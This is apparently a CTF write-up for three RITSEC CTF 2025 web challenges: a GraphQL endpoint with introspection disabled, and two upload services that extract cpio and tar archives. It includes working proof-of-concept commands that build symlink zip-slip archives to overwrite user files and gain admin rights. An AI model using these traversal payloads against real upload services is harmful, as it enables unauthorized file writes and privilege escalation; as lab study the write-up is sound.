RITSEC CTF 2025
Writeups for a few web challenges that I solved from RITSEC CTF 2025 — Cosmic Pathways, Upload Issues, and Upload Issues 2.
Cosmic Pathways
It looks like the alien Manorp setup this Glorp Question Literature (GQL) server? See if you can extract any alien secrets that might be hiding within.
Judging from the challenge description, this is likely a GraphQL challenge. The GraphQL instance can be identified at /graphql.
Here, introspection is disabled so you can’t enumerate the schema directly with queries. You can use clairvoyance to obtain the API schema if introspection is disabled.
clairvoyance finds secretQuery which gives us the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
...[SNIP]...
"fields": [
{
"args": [],
"deprecationReason": null,
"description": null,
"isDeprecated": false,
"name": "secretQuery",
"type": {
"kind": "SCALAR",
"name": "String",
"ofType": null
}
}
],
1
curl https://web-cosmic-pathways.ctf.ritsec.club/graphql -d 'query=query{secretQuery}'
Flag: RS{PR0B3_WA$_$UCC3$$FUL}
Upload Issues
This site lets you look at cpio archives. If only we had an admin account, we could look at the flag…
The application lets you upload cpio archives and it expands the archive, computes the md5sum of files inside and returns it to you.
From the source code, our cpio archive is expanded with the -idF flags.
1
2
3
4
5
6
7
8
9
data = file.read()
d = hashlib.md5()
d.update(data)
d.update(random.randbytes(4))
tmpname = d.hexdigest()
os.mkdir(f'uploads/{tmpname}')
with open(f'uploads/{tmpname}/{tmpname}.cpio', 'wb') as f:
f.write(data)
results = subprocess.run([f'cd uploads/{tmpname}/ && cpio -idF {tmpname}.cpio'], shell=True, capture_output=True, text=True)
There is a known zipslip bug in Debian cpio 2.13 which matches the version on the challenge instance. Because cpio is not passed with the --no-absolute-filenames flag, symlinks in the archive will be followed, this lets you perform a zipslip to write files outside of the intended directory.
The goal is to gain admin permissions (perm_level > 3) and we can see how our user is stored in the register function
1
2
3
4
user_json = {'passhash': passhash, 'perm_level': 2}
with open(f'users/{user}.json', 'w') as f:
json.dump(user_json, f)
So our goal is to use the zipslip, write our user’s json to the /app/users/ directory, then login as admin. You can use the password hash of the user that you registered when you uploaded the archive from the docker instance.
When you have the admin user, visit /admin to get the flag.
Here’s the PoC :
1
2
3
4
5
6
7
mkdir test_cpio
ln -sf /app/users test_cpio/users
echo '{"passhash": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "perm_level": 3}' > test_cpio/usersAtrav.json
cd test_cpio/
ls | cpio -ov > ../trav.cpio
cd ../
sed -i s/"usersA"/"users\/"/g trav.cpio
Flag: RS{b34m_m3_up_5c0tty}
Upload Issues 2
This site lets you look at tar archives. If only we had an admin account, we could look at the flag…
Similar challenge to Upload Issues, the challenge is identical except this one uses tar instead of cpio.
Here’s the snippet that extracts the tar archive:
1
2
3
4
os.mkdir(f'uploads/{tmpname}')
with open(f'uploads/{tmpname}/{tmpname}.tar', 'wb') as f:
f.write(data)
results = subprocess.run([f'cd uploads/{tmpname}/ && tar -xvf {tmpname}.tar'], shell=True, capture_output=True, text=True)
The vulnerability is in the tar utility on the challenge instance. The challenge instance is using BusyBox’s tar, and not GNU’s tar.
1
2
root@9be625f7cfb4:/app/uploads# tar -v
BusyBox v1.21.1 (2013-07-08 10:44:30 CDT) multi-call binary.
This is very old and you’ll find a CVE listed for it fairly quickly here. This is also another zipslip vulnerability and we’ll exploit it to write our user’s json to /app/users/ to gain admin permissions.
Here’s the PoC:
1
2
3
4
5
6
7
tar cvf poc.tar test.txt
ln -s /app/users symlink
tar --append -f poc.tar symlink
rm symlink
mkdir symlink
echo '{"passhash": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "perm_level": 3}' > symlink/benkyou.json
tar --append -f poc.tar symlink/benkyou.json
Flag: RS{t4k3n_2_abduct3d_by_a13n5}